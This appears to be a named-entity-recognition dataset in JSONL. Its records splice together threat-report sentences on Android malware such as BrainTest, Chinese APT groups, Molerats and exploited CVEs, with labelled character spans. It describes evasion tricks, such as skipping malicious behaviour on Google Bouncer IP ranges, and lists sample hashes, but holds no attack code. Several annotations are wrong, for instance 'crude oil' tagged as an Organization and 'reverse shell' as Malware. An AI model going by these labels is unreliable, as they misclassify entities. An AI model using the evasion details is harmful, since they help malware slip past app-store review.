{"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": [{"start": 118, "end": 126, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 294, "end": 301, "label": "System"}]}
{"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 85, "end": 96, "label": "System"}, {"start": 198, "end": 202, "label": "Organization"}, {"start": 236, "end": 244, "label": "Vulnerability"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 335, "end": 348, "label": "Malware"}, {"start": 352, "end": 355, "label": "Malware"}, {"start": 396, "end": 401, "label": "Organization"}]}
{"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 20, "end": 49, "label": "Vulnerability"}, {"start": 144, "end": 148, "label": "System"}, {"start": 222, "end": 237, "label": "Organization"}, {"start": 240, "end": 259, "label": "Organization"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}, {"start": 369, "end": 391, "label": "Vulnerability"}, {"start": 410, "end": 414, "label": "System"}, {"start": 461, "end": 469, "label": "Malware"}, {"start": 480, "end": 486, "label": "Malware"}, {"start": 505, "end": 514, "label": "Malware"}]}
{"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of the components and reinstall the component . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 23, "end": 46, "label": "Vulnerability"}, {"start": 213, "end": 223, "label": "System"}, {"start": 244, "end": 257, "label": "Malware"}, {"start": 282, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Vulnerability"}, {"start": 308, "end": 315, "label": "Vulnerability"}, {"start": 392, "end": 399, "label": "Organization"}]}
{"text": "After the the first instance of BrainTest was detected , Google removed the app from Google Play . The Word document usually exploits CVE-2012-0158 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": [{"start": 32, "end": 41, "label": "Malware"}, {"start": 57, "end": 63, "label": "Organization"}, {"start": 85, "end": 96, "label": "System"}, {"start": 103, "end": 116, "label": "Malware"}, {"start": 134, "end": 147, "label": "Vulnerability"}, {"start": 172, "end": 177, "label": "Organization"}]}
{"text": "Within days , the Check Point research team detected another instance with a different package name but which uses the same code . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 163, "end": 185, "label": "Malware"}, {"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 318, "end": 325, "label": "Malware"}, {"start": 351, "end": 366, "label": "Malware"}, {"start": 377, "end": 384, "label": "System"}]}
{"text": "The malware \u2019 s creators had used obfuscation to upload the new piece of malware to Google Play . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": [{"start": 84, "end": 95, "label": "System"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 126, "end": 148, "label": "Malware"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 255, "end": 260, "label": "Organization"}]}
{"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked \u2013 com.mile.brain , Packed \u2013 com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": [{"start": 98, "end": 112, "label": "Indicator"}, {"start": 124, "end": 142, "label": "Indicator"}, {"start": 168, "end": 179, "label": "System"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 371, "end": 380, "label": "Malware"}, {"start": 395, "end": 408, "label": "Vulnerability"}, {"start": 413, "end": 426, "label": "Vulnerability"}, {"start": 508, "end": 514, "label": "Malware"}, {"start": 515, "end": 522, "label": "Malware"}, {"start": 578, "end": 584, "label": "Malware"}, {"start": 589, "end": 598, "label": "Malware"}]}
{"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as system application . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 346, "end": 359, "label": "Vulnerability"}, {"start": 376, "end": 381, "label": "Organization"}]}
{"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using few anti-uninstall techniques ( described below ) and downloads and executes code from server without user consent . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": [{"start": 32, "end": 41, "label": "Indicator"}, {"start": 46, "end": 57, "label": "Indicator"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 259, "end": 283, "label": "Vulnerability"}, {"start": 372, "end": 377, "label": "Organization"}]}
{"text": "Detailed Malware Structure Malware Strucutre com.mile.brain ( SHA256 : 135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper .", "spans": [{"start": 45, "end": 59, "label": "Indicator"}, {"start": 71, "end": 135, "label": "Indicator"}, {"start": 178, "end": 189, "label": "System"}, {"start": 223, "end": 247, "label": "Vulnerability"}, {"start": 293, "end": 299, "label": "Organization"}, {"start": 304, "end": 315, "label": "Organization"}, {"start": 339, "end": 347, "label": "Organization"}, {"start": 352, "end": 362, "label": "Organization"}]}
{"text": "It contains encrypted java archive \u201c start.ogg \u201d in the assets directory and dynamically loads code with dalvik.system.DexClassLoader . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": [{"start": 37, "end": 46, "label": "Indicator"}, {"start": 105, "end": 133, "label": "Indicator"}, {"start": 176, "end": 193, "label": "Organization"}, {"start": 222, "end": 252, "label": "Malware"}, {"start": 295, "end": 308, "label": "Vulnerability"}, {"start": 341, "end": 369, "label": "Organization"}, {"start": 405, "end": 410, "label": "Organization"}]}
{"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by \u201c start.ogg. \u201d It sends a request to the server with the device \u2019 s configuration . PittyTiger could also use CVE-2014-1761 , which is more recent . An additional campaign has also been observed targeting Japanese entities .", "spans": [{"start": 0, "end": 6, "label": "Indicator"}, {"start": 18, "end": 82, "label": "Indicator"}, {"start": 128, "end": 138, "label": "Indicator"}, {"start": 210, "end": 220, "label": "Organization"}, {"start": 236, "end": 249, "label": "Vulnerability"}]}
{"text": "The server \u2019 s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": [{"start": 135, "end": 143, "label": "Organization"}, {"start": 178, "end": 195, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 396, "end": 402, "label": "Organization"}, {"start": 504, "end": 509, "label": "Organization"}]}
{"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The threat actor 's known working hours align to Chinese Standard TIME ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": [{"start": 137, "end": 143, "label": "Indicator"}, {"start": 190, "end": 205, "label": "System"}, {"start": 220, "end": 235, "label": "Malware"}, {"start": 347, "end": 360, "label": "Vulnerability"}, {"start": 578, "end": 584, "label": "Organization"}, {"start": 655, "end": 660, "label": "Organization"}]}
{"text": "jhfrte.jar : This is a java archive file downloaded from server . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": [{"start": 98, "end": 102, "label": "System"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 356, "end": 370, "label": "Organization"}, {"start": 413, "end": 420, "label": "Organization"}]}
{"text": "If a device isn \u2019 t rooted , it downloads from the server an exploit pack and executes it to obtain root on device . The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base .", "spans": [{"start": 121, "end": 124, "label": "System"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 276, "end": 280, "label": "System"}, {"start": 378, "end": 400, "label": "Organization"}, {"start": 405, "end": 416, "label": "Organization"}, {"start": 510, "end": 533, "label": "Organization"}]}
{"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Moafee may have chosen its targets based on the rich resources of South China Sea region \u2013 the world 's second business sea-lane , according to Wikipedia \u2013 including rare earth metals , crude oil , and natural gas .", "spans": [{"start": 78, "end": 87, "label": "Indicator"}, {"start": 184, "end": 188, "label": "System"}, {"start": 299, "end": 312, "label": "Vulnerability"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 428, "end": 434, "label": "Organization"}, {"start": 620, "end": 623, "label": "Organization"}, {"start": 638, "end": 641, "label": "Organization"}]}
{"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": [{"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 112, "end": 165, "label": "Indicator"}, {"start": 230, "end": 238, "label": "Organization"}, {"start": 256, "end": 273, "label": "Vulnerability"}, {"start": 508, "end": 525, "label": "Vulnerability"}, {"start": 577, "end": 594, "label": "Vulnerability"}, {"start": 608, "end": 616, "label": "Organization"}]}
{"text": "nis : The su application used to execute shell commands with root privileges . PLATINUM has used several zero-day exploits against their victims . Moafee and DragonOK both use a well-known proxy tool \u2013 HUC Packet Transmit MAL ( HTRAN ) \u2013 to disguise their geographical locations .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 105, "end": 122, "label": "Vulnerability"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 202, "end": 225, "label": "Malware"}, {"start": 228, "end": 233, "label": "Malware"}]}
{"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name \u2013 com.android.music.helper ) . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 21, "end": 85, "label": "Indicator"}, {"start": 163, "end": 187, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 360, "end": 369, "label": "Organization"}, {"start": 382, "end": 389, "label": "Organization"}, {"start": 479, "end": 485, "label": "Organization"}, {"start": 490, "end": 505, "label": "Organization"}]}
{"text": "This installs additional application from assets directory ( brother.apk ) and listens for PACKAGE_REMOVED events . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": [{"start": 61, "end": 72, "label": "System"}, {"start": 134, "end": 156, "label": "Vulnerability"}, {"start": 167, "end": 180, "label": "Vulnerability"}, {"start": 191, "end": 199, "label": "Organization"}, {"start": 251, "end": 257, "label": "Organization"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 292, "end": 298, "label": "System"}]}
{"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": [{"start": 3, "end": 14, "label": "System"}, {"start": 40, "end": 49, "label": "System"}, {"start": 61, "end": 72, "label": "System"}, {"start": 116, "end": 151, "label": "System"}, {"start": 218, "end": 235, "label": "Vulnerability"}, {"start": 412, "end": 423, "label": "Indicator"}]}
{"text": "brother.apk ( SHA256 : 422fec2e201600bb2ea3140951563f8c6fbd4f8279a04a164aca5e8e753c40e8 ) : The package name \u2013 com.android.system.certificate . In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers \u2013 all operated on CHINANET , and hosted in Guangdong Province .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 23, "end": 87, "label": "Indicator"}, {"start": 111, "end": 141, "label": "Indicator"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 379, "end": 384, "label": "Malware"}, {"start": 433, "end": 435, "label": "System"}]}
{"text": "System application installed by mcpef.apk . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": [{"start": 32, "end": 41, "label": "Indicator"}, {"start": 96, "end": 132, "label": "Vulnerability"}, {"start": 204, "end": 216, "label": "Organization"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 248, "end": 253, "label": "Malware"}, {"start": 269, "end": 271, "label": "System"}]}
{"text": "This has the same functionality as mcpef.apk . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": [{"start": 35, "end": 44, "label": "Indicator"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 152, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 189, "label": "Vulnerability"}, {"start": 213, "end": 224, "label": "Organization"}, {"start": 302, "end": 308, "label": "Organization"}]}
{"text": "In addition , it monitors to verify if com.android.music.helper package is removed . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": [{"start": 39, "end": 63, "label": "Indicator"}, {"start": 171, "end": 183, "label": "Vulnerability"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 309, "end": 317, "label": "Organization"}, {"start": 367, "end": 375, "label": "Organization"}]}
{"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts u sed for application persistency . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": [{"start": 3, "end": 12, "label": "Indicator"}, {"start": 26, "end": 37, "label": "Indicator"}, {"start": 87, "end": 94, "label": "Indicator"}, {"start": 173, "end": 190, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 283, "end": 298, "label": "Vulnerability"}]}
{"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP hosted domain that contains the following strings : \u201c google \u201d , \u201d android \u201d , \u201d 1e100 \u201d . The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . and as discovered later , even the U.S. and UK governments .", "spans": [{"start": 44, "end": 58, "label": "System"}, {"start": 159, "end": 186, "label": "Indicator"}, {"start": 189, "end": 216, "label": "Indicator"}, {"start": 219, "end": 246, "label": "Indicator"}, {"start": 249, "end": 274, "label": "Indicator"}, {"start": 369, "end": 376, "label": "System"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 455, "end": 470, "label": "Vulnerability"}, {"start": 574, "end": 585, "label": "Organization"}]}
{"text": "If any of these conditions is true , the application does not continue to execute the malicious flow . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": [{"start": 103, "end": 110, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 331, "end": 354, "label": "Organization"}]}
{"text": "This method is design to bypass the automatic Google Play protection mechanism called Bouncer . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 86, "end": 93, "label": "System"}, {"start": 167, "end": 186, "label": "System"}, {"start": 314, "end": 325, "label": "Vulnerability"}, {"start": 428, "end": 437, "label": "Malware"}, {"start": 485, "end": 494, "label": "Organization"}]}
{"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China \u2014 so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": [{"start": 51, "end": 65, "label": "System"}, {"start": 316, "end": 330, "label": "Vulnerability"}, {"start": 344, "end": 354, "label": "System"}, {"start": 492, "end": 502, "label": "Malware"}, {"start": 505, "end": 509, "label": "Malware"}, {"start": 516, "end": 519, "label": "Malware"}, {"start": 557, "end": 563, "label": "Organization"}, {"start": 591, "end": 595, "label": "Malware"}]}
{"text": "The time bomb triggers unpacker thread . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": [{"start": 95, "end": 103, "label": "Vulnerability"}, {"start": 151, "end": 162, "label": "Organization"}, {"start": 235, "end": 239, "label": "Malware"}, {"start": 463, "end": 478, "label": "Indicator"}]}
{"text": "Unpacker thread decrypt java archive from assets directory \u201c start.ogg \u201d , and dynamically loads it and calls the method \u201c a.a.a.b \u201d from this archive . Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal .", "spans": [{"start": 61, "end": 70, "label": "Indicator"}, {"start": 163, "end": 169, "label": "Organization"}, {"start": 202, "end": 215, "label": "Vulnerability"}, {"start": 247, "end": 251, "label": "Malware"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 436, "end": 439, "label": "Malware"}]}
{"text": "This method checks if eight hours have passed from the first run of application , and if so , request containing the device \u2019 s data to the server . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers .", "spans": [{"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 400, "end": 404, "label": "Malware"}, {"start": 431, "end": 450, "label": "System"}, {"start": 453, "end": 456, "label": "System"}, {"start": 486, "end": 494, "label": "Organization"}, {"start": 495, "end": 504, "label": "Organization"}]}
{"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": [{"start": 118, "end": 132, "label": "Vulnerability"}, {"start": 167, "end": 173, "label": "Organization"}, {"start": 227, "end": 243, "label": "Vulnerability"}, {"start": 290, "end": 299, "label": "Indicator"}, {"start": 327, "end": 346, "label": "Indicator"}]}
{"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": [{"start": 221, "end": 230, "label": "Malware"}, {"start": 272, "end": 285, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Malware"}, {"start": 320, "end": 332, "label": "Malware"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 474, "end": 482, "label": "Malware"}, {"start": 489, "end": 498, "label": "Organization"}, {"start": 503, "end": 527, "label": "Malware"}, {"start": 550, "end": 577, "label": "Malware"}, {"start": 580, "end": 583, "label": "Malware"}, {"start": 588, "end": 598, "label": "Malware"}, {"start": 601, "end": 610, "label": "Malware"}, {"start": 613, "end": 622, "label": "Malware"}, {"start": 625, "end": 634, "label": "Malware"}, {"start": 639, "end": 646, "label": "Malware"}]}
{"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": [{"start": 185, "end": 198, "label": "System"}, {"start": 254, "end": 267, "label": "Vulnerability"}, {"start": 316, "end": 325, "label": "Malware"}, {"start": 337, "end": 345, "label": "Malware"}, {"start": 357, "end": 365, "label": "Malware"}]}
{"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": [{"start": 113, "end": 119, "label": "Organization"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 260, "end": 268, "label": "Malware"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 306, "end": 320, "label": "Organization"}, {"start": 327, "end": 338, "label": "Organization"}]}
{"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": [{"start": 156, "end": 162, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 244, "end": 268, "label": "System"}, {"start": 298, "end": 312, "label": "Organization"}, {"start": 346, "end": 352, "label": "Organization"}, {"start": 355, "end": 364, "label": "Organization"}, {"start": 367, "end": 374, "label": "Organization"}, {"start": 381, "end": 384, "label": "Organization"}]}
{"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": [{"start": 131, "end": 138, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 222, "end": 254, "label": "Vulnerability"}, {"start": 305, "end": 312, "label": "System"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 387, "end": 401, "label": "Organization"}]}
{"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 201, "end": 233, "label": "Vulnerability"}, {"start": 284, "end": 291, "label": "System"}]}
{"text": "This event triggers archive downloading thread . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . The United States and countries in Europe are targeted as well .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 114, "end": 122, "label": "System"}, {"start": 131, "end": 145, "label": "System"}, {"start": 148, "end": 152, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}]}
{"text": "Once the event is triggered , it registers a timer . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 .", "spans": [{"start": 57, "end": 69, "label": "Organization"}, {"start": 113, "end": 127, "label": "Vulnerability"}, {"start": 145, "end": 152, "label": "System"}, {"start": 159, "end": 179, "label": "System"}]}
{"text": "The timer triggers additional thread which makes a request to the server . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The MuddyWater attacks are primarily against Middle Eastern nations .", "spans": [{"start": 75, "end": 80, "label": "Organization"}, {"start": 124, "end": 138, "label": "Vulnerability"}, {"start": 156, "end": 163, "label": "System"}, {"start": 170, "end": 190, "label": "System"}]}
{"text": "It expects a json with url , class and method name . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 106, "end": 120, "label": "Vulnerability"}, {"start": 138, "end": 145, "label": "System"}, {"start": 152, "end": 172, "label": "System"}]}
